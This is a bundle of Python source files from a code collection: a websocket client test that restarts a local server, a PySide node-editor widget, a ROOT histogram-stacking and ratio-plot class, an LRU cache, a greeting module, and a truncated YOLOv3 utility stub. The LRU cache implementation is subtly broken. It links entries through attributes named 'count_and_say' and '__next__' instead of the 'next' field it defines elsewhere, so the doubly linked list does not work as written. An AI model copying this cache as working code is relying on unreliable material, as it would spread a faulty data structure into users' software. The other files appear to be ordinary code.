+{"seq_id":"219325213","text":"#!/usr/bin/env python\n# coding: utf-8\n# Copyright (c) 2011-2014, Sylvain Hellegouarch, Abram Hindle\n# All rights reserved.\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# \n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of ws4py nor the names of its contributors may be used\n# to endorse or promote products derived from this software without\n# specific prior written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\n# pip install ws4py\n# pip install gevent\n\nfrom gevent import monkey\nmonkey.patch_all()\nimport os\nimport gevent\nfrom ws4py.client.geventclient import WebSocketClient\nimport json\n\n\nworld = dict()\n# set this to something sane \ncalls = 3000\n# ugh there's too much output? 
Well drop calls down\n# calls = 100\n\ndef utf8(utf8bytes):\n return utf8bytes.decode(\"utf-8\")\n\nclass WorldClient(WebSocketClient):\n def opened(self):\n self.count = 0\n if (self.name is None):\n self.name = \"\"\n\n def send_new_entity(self,i):\n entity = \"X\"+str(i)\n data = {'x':i,'y':i}\n world[entity] = data\n packet = { entity : data }\n self.send(json.dumps(packet))\n print(\"Sent %s\" % entity)\n\n def closed(self, code, reason):\n print((\"Closed down %s \" % self.name, code, reason))\n\n def receive_my_message(self,m):\n print(\"RECV %s \" % m)\n w = json.loads(utf8(m.data))\n kcnt = 0\n for key in w:\n if (key in world):\n assert world[key] == w[key]\n world[key] = w[key]\n kcnt += 1\n if (kcnt > 0):\n self.count += 1\n if (self.count >= calls):\n self.close(reason='Bye bye')\n\n def incoming(self):\n while self.count < calls:\n m = self.receive()\n print(\"Incoming RECV %s %s \" % (self.name,m))\n if m is not None:\n self.receive_my_message( m )\n else:\n return\n\n def outgoing(self):\n for i in range(0,calls):\n self.send_new_entity(i)\n \nif __name__ == '__main__':\n try:\n os.system(\"kill -9 $(lsof -t -i:8000)\");\n os.system(\"bash run.sh &\");\n print(\"Sleeping 3 seconds\")\n gevent.sleep(3)\n ws = WorldClient('ws://127.0.0.1:8000/subscribe', protocols=['http-only', 'chat'])\n ws2 = WorldClient('ws://127.0.0.1:8000/subscribe', protocols=['http-only', 'chat'])\n ws.daemon = False\n ws2.daemon = False\n ws.name = \"Reader/Writer\"\n ws2.name = \"Reader\"\n ws.connect() \n ws2.connect() \n ''' what we're doing here is that we're sending new entities and getting them\n back on the websocket '''\n greenlets = [\n gevent.spawn(ws.incoming),\n gevent.spawn(ws.outgoing),\n ]\n gws2 = gevent.spawn(ws2.incoming)\n gevent.joinall(greenlets)\n ws2.close()\n gws2.join(timeout=1)\n # here's our final test\n print(\"Counts: %s %s\" % (ws.count , ws2.count))\n assert ws.count == calls, (\"Expected Responses were given! %d %d\" % (ws.count, calls))\n assert ws2.count >= (9*calls/10), (\"2nd Client got less than 9/10 of the results! 
%s\" % ws2.count)\n print(\"Looks like the tests passed!\")\n finally:\n #except KeyboardInterrupt:\n ws.close()\n ws2.close()\n gevent.sleep(1)\n os.system(\"kill -9 $(lsof -t -i:8000)\");\n print(\"Sleeping 2 seconds\")\n gevent.sleep(2)\n","sub_path":"freetests.py","file_name":"freetests.py","file_ext":"py","file_size_in_byte":4638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"515624531","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n Author: kun.wang\n Create: 2015-06-24\n\nusing: PySide\n\"\"\"\nimport sys\n\n# import PySide.QtCore as QtCore\nimport PySide.QtGui as QtGui\n\n# from task_node import TaskNodePort\nfrom task_node import TaskNode\nfrom task_node import TaskNodeConnection\nfrom task_node import NodesEditor\n\n# import honey\n# import honey_context as hc\n\n\nclass TaskWorkFlow(QtGui.QWidget):\n \"\"\"工作流设计界面,包含NodesEditor跟GraphicView\"\"\"\n\n def __init__(self, parent=None):\n super(TaskWorkFlow, self).__init__(parent)\n self.scene = NodesEditor()\n self.view = QtGui.QGraphicsView(self.scene)\n self.view.setBackgroundBrush(QtGui.QBrush(QtGui.QColor(200, 200, 200)))\n self.main_layout = QtGui.QVBoxLayout()\n self.main_layout.setContentsMargins(0, 0, 0, 0)\n self.setLayout(self.main_layout)\n self.main_layout.addWidget(self.view)\n\n def clear(self):\n self.scene.clear()\n\n def add_node(self, node):\n pass\n\n def add_connector(self, conn):\n pass\n\n def add_test(self):\n model = TaskNode(\"Model\")\n model.add_port(\"Maya\")\n port_a = model.add_port(\"Houdini\", True)\n self.scene.addItem(model)\n\n model2 = TaskNode(\"Texture\")\n port_b = model2.add_port(\"Maya\")\n model2.add_port(\"Houdini\", True)\n self.scene.addItem(model2)\n model2.setPos(200, 100)\n\n conn = TaskNodeConnection()\n conn.set_start_port(port_a)\n conn.set_end_port(port_b)\n conn.update_path()\n self.scene.addItem(conn)\n\n model3 = TaskNode(\"Rigging\")\n model3.add_port(\"Abc\")\n model3.add_port(\"Ass\", True)\n self.scene.addItem(model3)\n model3.setPos(360, -100)\n\n\nif __name__ == '__main__':\n app = QtGui.QApplication(sys.argv)\n\n a = TaskWorkFlow()\n a.add_test()\n a.resize(900, 600)\n a.show()\n\n sys.exit(app.exec_())\n","sub_path":"OpenCGPipeline/Honey/project_ui/task_ui/task_workflow.py","file_name":"task_workflow.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"347874663","text":"import ROOT\n\nimport sys\nimport numpy as np\n\nfrom toolbox import printer\nfrom toolbox import plotSetup as ps\nimport hpUtil\nfrom Setters import HSSetters\n\nclass HistogramSetup(HSSetters):\n def getStackTemplatesInOrder(self, templates):\n '''\n loop over all templates and find out if they are to be put into the stack \n then order them by stacking order defined by integral or the plottingOrder\n '''\n stackTemplates = []\n # loop over templates and get all that are to be in stack\n for proc in templates:\n if templates[proc].isData: continue\n if templates[proc].partOfMerged: continue\n if proc in self.plotAsLine: continue\n if not self.includeOnly is None:\n if not proc in self.includeOnly:\n continue\n stackTemplates.append(proc)\n \n # get integral values of templates\n stackIntegrals = {p: templates[p].nom.Integral() for p in stackTemplates}\n\n # sort by integral (biggest first)\n orderedTemplates = []\n for proc in sorted(stackIntegrals, key=stackIntegrals.get, reverse=True):\n if proc in self.plottingOrder: continue\n 
orderedTemplates.append(proc)\n\n # reverse the order if option is set\n if self.highestIntegralOnTop:\n orderedTemplates.reverse()\n\n # append the processes predefined by plottingOrder\n orderedTemplates+=self.plottingOrder\n\n # returns list of processes. first process is lowest in stack\n return orderedTemplates\n\n def getLineTemplates(self, templates, stackIntegral):\n '''\n get all templates that are to be plot as lines with their scaling factor\n '''\n lineTemplates = {}\n # loop over templates and get all that are to be lines\n for proc in templates:\n if templates[proc].isData: continue\n if templates[proc].partOfMerged: continue\n if not self.includeOnly is None:\n if not proc in self.includeOnly:\n continue\n if proc in self.plotAsLine:\n lineTemplates[proc] = self.plotAsLine[proc]\n if proc in self.plotAsBoth:\n lineTemplates[proc] = self.plotAsBoth[proc]\n\n lineHistograms = {}\n lineErrors = {}\n for proc in lineTemplates:\n lineHistograms[proc] = templates[proc].nom.Clone()\n scale = lineTemplates[proc]\n if scale == -1:\n scale = stackIntegral/(lineHistograms[proc].Integral()+1e-10)\n lineTemplates[proc] = scale\n lineHistograms[proc].Scale(scale)\n\n lineErrors[proc] = {}\n if self.scaleLineErrors:\n errorScale = scale\n else:\n errorScale = 1.\n # loop over systematics \n for sys in templates[proc].upValues:\n lineErrors[proc][sys] = ROOT.TGraphAsymmErrors(lineHistograms[proc].Clone())\n for iBin in range(lineHistograms[proc].GetNbinsX()):\n lineErrors[proc][sys].SetPointEYlow( \n iBin, templates[proc].dnValues[sys][iBin]*errorScale)\n lineErrors[proc][sys].SetPointEYhigh(\n iBin, templates[proc].upValues[sys][iBin]*errorScale)\n lineErrors[proc][sys].SetPointEXlow( \n iBin, lineHistograms[proc].GetBinWidth(iBin+1)/2.)\n lineErrors[proc][sys].SetPointEXhigh( \n iBin, lineHistograms[proc].GetBinWidth(iBin+1)/2.)\n\n '''\n lineTemplates: {procName: lineScale}\n lineHistograms: {procName: template}\n lineErrors: {procName: {sysGroup: errorband}}\n '''\n return lineTemplates, lineHistograms, lineErrors\n\n def getData(self, templates):\n '''\n get data template based on either real data or pseudo date\n also edits the uncertainties of pseudo data to be sqrt(N)\n '''\n if self.realData:\n printer.printInfo(\"\\tloading real data histogram\")\n data = templates[\"data_obs\"].nom.Clone()\n return data\n\n else:\n printer.printInfo(\"\\tloading pseudo data histogram\")\n # get list of pseudodata processes\n processes = self.pseudodataProcesses\n # if no information is given just use the background\n if processes is None:\n processes = []\n for proc in templates:\n if templates[proc].isData: continue\n if templates[proc].partOfMerged: continue\n if proc in self.plotAsLine: continue\n if not self.includeOnly is None:\n if not proc in self.includeOnly:\n continue\n processes.append(proc)\n\n # build pseudodata histogram\n pseudodata = None\n for proc in processes:\n if pseudodata is None:\n pseudodata = templates[proc].nom.Clone()\n else:\n pseudodata.Add(templates[proc].nom.Clone())\n\n # set poissonian bin error\n for iBin in range(pseudodata.GetNbinsX()):\n pseudodata.SetBinError(iBin+1, np.sqrt(pseudodata.GetBinContent(iBin+1)))\n return pseudodata\n\n def stackTemplates(self, templates, stackTemplates):\n '''\n stack templates for plotting\n also load the uncertainty bands for the stack\n '''\n stackedHistograms = []\n stackResUp = {}\n stackResDn = {}\n \n # build histogram stacks\n stack = None\n tempTemplates = [t for t in stackTemplates]\n for proc in tempTemplates:\n 
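# iterate over the copy so that unknown processes can be popped from\n            # stackTemplates itself without disturbing the loop\n            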
printer.printInfo(\"\\tstacking: \"+proc)\n if not proc in templates:\n printer.printWarning(\n \"\\tprocess {} is not defined\".format(proc))\n stackTemplates.pop(stackTemplates.index(proc))\n continue\n # adding template to stakc\n if stack is None:\n stack = templates[proc].nom.Clone()\n else:\n stack.Add(templates[proc].nom.Clone())\n stackedHistograms.append(stack.Clone())\n\n # looping over defined systematics\n for sys in templates[proc].upValues:\n if not sys in stackResUp:\n stackResUp[sys] = np.zeros(templates[proc].nom.GetNbinsX())\n if not sys in stackResDn:\n stackResDn[sys] = np.zeros(templates[proc].nom.GetNbinsX())\n # stat uncertainty is directly inferred from binerror of stack\n if sys == \"stat\":\n for iBin in range(templates[proc].nom.GetNbinsX()):\n stackResUp[sys][iBin] = stack.GetBinError(iBin+1)\n stackResDn[sys][iBin] = stack.GetBinError(iBin+1)\n continue\n # looping over bins of other systs and adding them lin/quad\n for iBin in range(templates[proc].nom.GetNbinsX()):\n if self.sumSystsBetweenProcessesLinear:\n stackResUp[sys][iBin] += templates[proc].upValues[sys][iBin]\n stackResDn[sys][iBin] += templates[proc].dnValues[sys][iBin]\n else:\n stackResUp[sys][iBin] = np.sqrt(\n stackResUp[sys][iBin]**2 + templates[proc].upValues[sys][iBin]**2)\n stackResDn[sys][iBin] = np.sqrt(\n stackResDn[sys][iBin]**2 + templates[proc].dnValues[sys][iBin]**2)\n\n # build TAsymErrorGraphs\n stackErrors = {}\n for sys in stackResDn:\n stackErrors[sys] = ROOT.TGraphAsymmErrors(stack.Clone())\n for iBin in range(stack.GetNbinsX()):\n stackErrors[sys].SetPointEYlow( iBin, stackResDn[sys][iBin])\n stackErrors[sys].SetPointEYhigh(iBin, stackResUp[sys][iBin])\n stackErrors[sys].SetPointEXlow( iBin, stack.GetBinWidth(iBin+1)/2.)\n stackErrors[sys].SetPointEXhigh(iBin, stack.GetBinWidth(iBin+1)/2.)\n\n return stackedHistograms, stackErrors\n \n def getStackIntegral(self, stackedHistograms):\n '''\n get integral of stack and flag if there even is a stack\n '''\n hasHistStack = False\n stackIntegral = 1.\n if len(stackedHistograms) > 0:\n stackIntegral = stackedHistograms[-1].Integral()\n hasHistStack = True\n \n return hasHistStack, stackIntegral\n\n def getPlotRange(self, stackedHistograms, lineHistograms):\n ''' \n determine x-axis plot range\n '''\n yMax = 0.\n yMinMax = 1e10\n for h in [stackedHistograms[-1]]+lineHistograms.values():\n yMax = max(yMax, h.GetBinContent(h.GetMaximumBin()))\n yMinMax = min(yMinMax, h.GetBinContent(h.GetMaximumBin()))\n if self.logY: \n return yMinMax/1000+1e-10, yMax*10\n else:\n return 1e-2, yMax*1.5\n\n def getDataInfo(self, histStack = True):\n '''\n get info if data is used and label for data\n '''\n # determine if data is used\n # data will not be used of there is no stack of histograms\n useData = ((not self.plotBlind) and histStack)\n\n # get data label \n if self.realData:\n dataLabel = self.dataLabel\n else:\n dataLabel = self.pseudodataLabel\n\n return useData, dataLabel\n\n\n def getRatioInfo(self, useData):\n '''\n figure out of there is a ratio plot and which one\n also determine the canvas indices for the ratios\n '''\n doRatio = False\n doubleRatio = False\n\n # canvas index of ratios\n fracIdx = 2\n diffIdx = 3\n\n if (self.ratio or self.differenceRatio) and useData:\n doRatio = True\n if self.ratio and self.differenceRatio:\n doubleRatio = True\n if not self.ratio:\n diffIdx = 2\n\n return doRatio, doubleRatio, fracIdx, diffIdx\n\n def getyTitle(self, divideByBinWidth, xLabel):\n '''\n get title on y axis\n per default it is 'Events'\n 
'''\n yTitle = \"Events\"\n \n # add info when divide by bin width was activated\n if divideByBinWidth:\n if xLabel.endswith(\"[GeV]\"):\n yTitle+= \" / GeV\"\n else:\n yTitle+= \" / bin width\"\n\n return yTitle\n\n def setupHistogram(self, h, line, yMin, yMax, yTitle, xLabel, fillColor, doRatio):\n '''\n set plotting style for histograms in stack and as lines\n '''\n # edit range\n h.GetYaxis().SetRangeUser(yMin, yMax)\n\n # edit y axis\n h.GetYaxis().SetTitle(yTitle)\n h.GetYaxis().SetTitleSize(\n h.GetYaxis().GetTitleSize()*1.5)\n h.GetYaxis().SetLabelSize(\n h.GetYaxis().GetLabelSize()*1.2)\n\n # edit x axis\n h.GetXaxis().SetTitle(\"\")\n if not doRatio:\n h.GetXaxis().SetTitle(xLabel)\n\n # edit title an stats\n h.SetTitle(\"\")\n h.SetStats(False)\n\n # edit plotting style\n if line:\n h.SetFillColor(0)\n h.SetLineColor(fillColor)\n h.SetLineWidth(2)\n else:\n h.SetFillColor(fillColor)\n h.SetLineColor(ROOT.kBlack)\n h.SetLineWidth(self.stackLineWidth)\n\n\n\n def getListOfErrorbands(self, hasHistStack, stackTemplates, lineTemplates, templates):\n '''\n determine list of errorbands to be drawn based on the options that are set\n '''\n if self.removeSystErrors:\n errorbands = []\n elif not self.onlyPlotErrorGroups is None:\n errorbands = self.onlyPlotErrorGroups\n else:\n # TODO find better method to automatically determine syst groups\n if hasHistStack:\n errorbands = templates[stackTemplates[-1]].majorSystGroups\n else:\n errorbands = templates[lineTemplates.keys()[0]].majorSystGroups\n\n if self.statError:\n errorbands = list(errorbands)\n errorbands.append(\"stat\")\n\n return errorbands\n\n def setupErrorband(self, g, syst, line = False, processColor = None):\n '''\n get style in which errorband should be drawn\n '''\n ebStyle, ebColor, ebAlpha = hpUtil.getErrorStyle(syst)\n g.SetFillStyle(ebStyle)\n if line:\n ebColor = processColor\n g.SetLineColorAlpha(ebColor, ebAlpha)\n g.SetFillColorAlpha(ebColor, ebAlpha)\n\n def setupDataHistogram(self, data):\n '''\n set style of data histogram\n '''\n data.SetLineColor(ROOT.kBlack)\n data.SetMarkerStyle(20)\n data.SetFillStyle(0)\n data.SetMarkerSize(1.5)\n data.SetLineWidth(1)\n\n def getRatioLine(self, stack, frac, dataLabel, doubleRatio, xLabel):\n '''\n get and setup line drawn to ratio plot\n works for frac and difference ratio\n adjusted with 'frac' option\n '''\n # get line from stack clone\n line = stack.Clone()\n line.Divide(line)\n line.SetFillStyle(0)\n \n # get yaxis label \n if frac:\n label = self.ratioLabel.replace(\"$DATA\",dataLabel)\n else:\n label = self.differenceRatioLabel.replace(\"$DATA\",dataLabel)\n line.GetYaxis().SetTitle(label)\n\n # get xaxis label\n xTitle = xLabel\n if doubleRatio and frac:\n xTitle = \"\"\n line.GetXaxis().SetTitle(xTitle)\n\n # scale axis legends\n line.GetXaxis().SetLabelSize(line.GetXaxis().GetLabelSize()*2.4)\n line.GetXaxis().SetTitleSize(line.GetXaxis().GetTitleSize()*3)\n if doubleRatio and frac:\n line.GetYaxis().SetLabelSize(line.GetYaxis().GetLabelSize()*3.3)\n line.GetYaxis().SetTitleSize(line.GetYaxis().GetTitleSize()*2.5)\n line.GetYaxis().SetTitleOffset(0.3)\n else:\n line.GetYaxis().SetLabelSize(line.GetYaxis().GetLabelSize()*2.2)\n line.GetYaxis().SetTitleSize(line.GetYaxis().GetTitleSize()*1.8)\n line.GetYaxis().SetTitleOffset(0.5)\n\n # set bin contents and errors\n line.GetYaxis().SetNdivisions(505)\n line.GetXaxis().SetLabelOffset(0.01)\n if frac: val = 1\n else: val = 0\n for i in range(line.GetNbinsX()):\n line.SetBinContent(i+1, val)\n line.SetBinError(i+1, 0)\n\n 
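# the bin contents were forced to the reference value above\n        # (1 for the fractional ratio, 0 for the difference ratio)\n        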
# set line style\n        line.SetLineWidth(1)\n        line.SetLineColor(ROOT.kBlack)\n\n        # set range\n        line.GetYaxis().SetRangeUser(0.5,1.5)\n\n        return line \n\n    def getRatioData(self, data, stack, frac = True):\n        '''\n        get data histogram for ratio plot\n        also return min and max values\n        '''\n        r = data.Clone()\n        if frac:\n            rMax = 1\n            rMin = 1\n            r.Divide(stack.Clone())\n        else:\n            rMax = 0\n            rMin = 0\n\n        for iBin in range(r.GetNbinsX()):\n            if not frac:\n                r.SetBinContent(iBin+1,\n                    (r.GetBinContent(iBin+1)-stack.GetBinContent(iBin+1)))\n            rMax = max(r.GetBinContent(iBin+1), rMax) \n            rMin = min(r.GetBinContent(iBin+1), rMin) \n\n        r.SetLineColor(ROOT.kBlack)\n        r.SetLineWidth(1)\n        r.SetMarkerStyle(20)\n        ROOT.gStyle.SetErrorX(0)\n        return r, rMin, rMax\n    \n    def setupRatioErrorband(self, g, frac = True):\n        '''\n        setup errorband for ratio plot\n        adjust errorband size to ratio\n        '''\n        for iBin in range(g.GetN()):\n            x = g.GetPointX(iBin)\n            y = g.GetPointY(iBin)\n            if not frac:\n                # difference ratio: band is centred on the zero line,\n                # errors stay absolute\n                g.SetPoint(iBin, x, 0)\n            else:\n                # fractional ratio: band is centred on one, errors are\n                # rescaled by the nominal bin content\n                g.SetPoint(iBin, x, 1)\n                if y > 0:\n                    g.SetPointEYlow( iBin, g.GetErrorYlow(iBin)/y)\n                    g.SetPointEYhigh(iBin, g.GetErrorYhigh(iBin)/y)\n                else:\n                    g.SetPointEYlow(iBin, 0)\n                    g.SetPointEYhigh(iBin, 0)\n\n\n\n\n    def drawHistogram(self, plotName, xLabel, channelLabel, lumi, \n            divideByBinWidth, outFile, templates):\n        ''' \n        routine to setup the histograms\n        get stack histograms, line histograms and data\n        plot them in first canvas and add errorbands\n        add fractional ratio and difference ratio plot including errorbands\n        '''\n\n        # figure out which processes in which order are included in the stack\n        # lowest is first\n        stackTemplates = self.getStackTemplatesInOrder(templates)\n\n        # get list of stack histograms and also TGraphAsymErrors for uncertainties\n        stackedHistograms, stackErrors = self.stackTemplates(templates, stackTemplates)\n\n        # get stack integral\n        hasHistStack, stackIntegral = self.getStackIntegral(stackedHistograms)\n        \n        # get histogram lines to be plotted\n        lineTemplates, lineHistograms, lineErrors = self.getLineTemplates(templates, stackIntegral)\n\n        # get data\n        useData, dataLabel = self.getDataInfo(hasHistStack)\n        if useData:\n            data = self.getData(templates)\n\n        # get plotting range \n        yMin, yMax = self.getPlotRange(stackedHistograms, lineHistograms)\n\n        # get info about ratios\n        doRatio, doubleRatio, fracIdx, diffIdx = self.getRatioInfo(useData)\n\n        # get yTitle\n        yTitle = self.getyTitle(divideByBinWidth, xLabel)\n        \n        # load canvas\n        c = ps.getCanvas(plotName,\n            log = self.logY,\n            ratio = doRatio,\n            doubleRatio = doubleRatio,\n            sideLegend = True\n            )\n\n        # determine which errorbands to use\n        errorbands = self.getListOfErrorbands(\n            hasHistStack, stackTemplates, lineTemplates, templates)\n\n        # plot stack histograms on canvas\n        c.cd(1)\n        nLegendEntries = 0\n        firstPlot = True\n        for idx in range(len(stackTemplates)-1, -1, -1):\n            proc = stackTemplates[idx]\n            printer.printInfo("\tadding process to stack {}".format(proc))\n\n            self.setupHistogram(stackedHistograms[idx], False,\n                yMin, yMax, yTitle, xLabel, templates[proc].color, doRatio)\n\n            # draw histogram\n            if firstPlot:\n                stackedHistograms[idx].Draw("histo")\n                firstPlot = False\n            else:\n                stackedHistograms[idx].Draw("histo same")\n            \n            nLegendEntries+=1\n\n        # add errorbands on stack\n        for syst in errorbands:\n            printer.printInfo("\tadding errorband {} on stack".format(syst))\n            if not syst in stackErrors:\n                printer.printWarning("\t\tno errorband for sys group {} found".format(syst))\n                continue\n            
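# style the band for this systematic group and overlay it on the stack\n            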
self.setupErrorband(stackErrors[syst], syst, line = False)\n\n # draw errorband\n stackErrors[syst].Draw(\"same2\")\n nLegendEntries+=1\n \n # plot all the lines to be plot\n for line in lineTemplates:\n printer.printInfo(\"\\tdrawing histogram line {}\".format(line))\n\n # setup histogram\n self.setupHistogram(lineHistograms[line], True,\n yMin, yMax, yTitle, xLabel, templates[line].color, doRatio)\n\n # draw histogram\n if firstPlot:\n lineHistograms[line].Draw(\"histo\")\n firstPlot = False\n else:\n lineHistograms[line].Draw(\"histo same\")\n\n nLegendEntries+=1\n\n # include errorbars on lines\n if not self.errorbandOnLines:\n continue\n\n # draw errorband for lines\n for syst in errorbands:\n printer.printInfo(\"\\tadding errorband {} on line {}\".format(syst, line))\n if not syst in lineErrors[line]:\n printer.printWarning(\"\\t\\tno errorband for sys group {} found\".format(syst))\n continue\n\n # setup errorband\n self.setupErrorband(lineErrors[line][syst], \n syst, line = True, processColor = templates[line].color)\n\n # draw errorband\n lineErrors[line][syst].Draw(\"same2\")\n\n\n if useData:\n # setup and draw data histogram\n self.setupDataHistogram(data)\n data.Draw(\"histPEX0same\") \n nLegendEntries+=1 \n \n # redraw the axis\n if hasHistStack:\n stackedHistograms[-1].Draw(\"axissame\")\n\n # setup legend\n l = ROOT.TLegend(0.81,0.93*(1.-nLegendEntries/14.),0.98,0.93)\n l.SetBorderSize(0)\n # add data entry\n if useData:\n l.AddEntry(data, dataLabel, \"P\")\n # add line entries\n for line in lineTemplates:\n lineLabel = templates[line].label\n if not lineTemplates[line] == 1:\n lineLabel+= \" (x {:.0f})\".format(lineTemplates[line])\n l.AddEntry(lineHistograms[line], lineLabel, \"L\")\n # add stack entries\n for idx in range(len(stackTemplates)-1, -1, -1):\n proc = stackTemplates[idx]\n l.AddEntry(stackedHistograms[idx], templates[proc].label, \"F\")\n # add uncertainty entries\n for syst in errorbands:\n if not syst in stackErrors:\n continue\n l.AddEntry(stackErrors[syst], syst, \"F\")\n # draw legend\n l.Draw()\n \n # build fractional ratio\n if self.ratio:\n c.cd(fracIdx)\n \n # get line \n line = self.getRatioLine(stackedHistograms[-1], True,\n dataLabel, doubleRatio, xLabel)\n\n # get data histogram \n r, rMin, rMax = self.getRatioData(data, stackedHistograms[-1], True)\n\n # set ratio range\n line.GetYaxis().SetRangeUser(0.5, 1.5)\n\n # draw ratio line\n line.DrawCopy(\"histo\")\n\n # draw ratio data\n r.DrawCopy(\"sameP\")\n\n # add errorbands\n ratioErrors = {}\n for syst in errorbands:\n if not syst in stackErrors:\n printer.printWarning(\"\\t\\tno errorband for sys group {} found\".format(syst))\n continue\n\n # setup ratio errorband\n ratioErrors[syst] = stackErrors[syst].Clone()\n self.setupRatioErrorband(ratioErrors[syst], frac = True)\n\n # draw errorband\n ratioErrors[syst].Draw(\"same2\")\n\n # redraw the line and data\n line.DrawCopy(\"histo same\")\n r.DrawCopy(\"sameP\")\n\n # build fractional ratio\n if self.differenceRatio:\n c.cd(diffIdx)\n\n # get line\n dline = self.getRatioLine(stackedHistograms[-1], False,\n dataLabel, doubleRatio, xLabel)\n\n # get data histogram\n d, dMin, dMax = self.getRatioData(data, stackedHistograms[-1], False)\n\n # set ratio range\n dline.GetYaxis().SetRangeUser(\n 1.5*max(dMin, -0.2*dMax), 1.5*max(dMax, -0.2*dMin))\n\n # draw ratio line\n dline.DrawCopy(\"histo\")\n\n # draw ratio data\n d.DrawCopy(\"sameP\")\n \n # add errorbands\n diffErrors = {}\n for syst in errorbands:\n if not syst in stackErrors:\n 
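# this systematic group has no band stored for the stack, warn and skip it\n                    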
printer.printWarning(\"\\t\\tno errorband for sys group {} found\".format(syst))\n continue\n\n # setup ratio errorband\n diffErrors[syst] = stackErrors[syst].Clone()\n self.setupRatioErrorband(diffErrors[syst], frac = False)\n\n # draw errorband\n diffErrors[syst].Draw(\"same2\")\n\n # redraw the line and data\n dline.DrawCopy(\"histo same\")\n d.Draw(\"sameP\")\n\n\n # add some labels\n ps.printCMSLabel(c, privateWork = self.privateWork, ratio = doRatio)\n if not lumi is None:\n ps.printLumiLabel(c, lumi = lumi, ratio = doRatio, sideLegend = True)\n if not channelLabel is None:\n ps.printChannelLabel(c, channelLabel, ratio = doRatio)\n \n # save output\n c.SaveAs(outFile)\n c.SaveAs(outFile.replace(\".pdf\", \".png\"))\n\n \n","sub_path":"toolbox/harryPlotter/HistogramSetup.py","file_name":"HistogramSetup.py","file_ext":"py","file_size_in_byte":24775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"104220278","text":"\n\nclass Entry:\n def __init__(self, key=None, value=None):\n self.key = key\n self.value = value\n self.next = None\n self.previous = None\n\n\nclass LRUCache:\n # @param capacity, an integer\n def __init__(self, capacity):\n self.capacity = capacity\n self.length = 0\n self.head = Entry()\n self.head.previous = self.head.__next__ = self.head\n self.dictionary = {}\n\n # @return an integer\n def get(self, key):\n if key in self.dictionary:\n entry = self.dictionary.get(key)\n self.sethead(entry)\n return entry.value\n return -1\n\n # @param key, an integer\n # @param value, an integer\n # @return nothing\n def set(self, key, value):\n if key in self.dictionary:\n entry = self.dictionary.get(key)\n entry.value = value\n self.sethead(entry)\n else:\n entry = Entry(key, value)\n if self.length < self.capacity:\n self.add(entry)\n self.dictionary[key] = entry\n self.length += 1\n else:\n self.add(entry)\n self.dictionary[key] = entry\n last = self.head.previous\n self.remove(last)\n self.dictionary.pop(last.key)\n\n def remove(self, entry):\n entry.count_and_say.previous = entry.previous\n entry.previous.count_and_say = entry.count_and_say\n\n def add(self, entry):\n entry.count_and_say = self.head.__next__\n entry.previous = self.head\n entry.count_and_say.previous = entry\n entry.previous.next = entry\n\n def sethead(self, entry):\n self.remove(entry)\n self.add(entry)","sub_path":"Python/LRU Cache.py","file_name":"LRU Cache.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"36690305","text":"#!/usr/bin/python3.5\n\n'a test module'\n__author__='guoguo'\nimport sys\n\ndef test():\n\targs = sys.argv\n\tif len(args) == 1:\n\t\tprint('Hello,world')\n\telif len(args) == 2:\n\t\tprint('Hello,%s' %args[1])\n\telse:\n\t\tprint('Too many arguments')\n\ndef _private_1(name):\n\treturn 'Hello, %s' %name\n\ndef _private_2(name):\n\treturn 'Hi, %s' %name\n\ndef greeting(name):\n\tif len(name) > 3:\n\t\treturn _private_1(name)\n\telse:\n\t\treturn _private_2(name)\n\n\nif __name__ == '__main__':\n\tprint(greeting('ceshi'))\n","sub_path":"module/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"204447050","text":"\nimport cv2\nimport random\nimport numpy as np\n\nfrom Define import *\nfrom Utils import *\n\nfrom DataAugmentation import *\n\nclass YOLOv3_Utils:\n def __init__(self):\n self.input_sizes = 
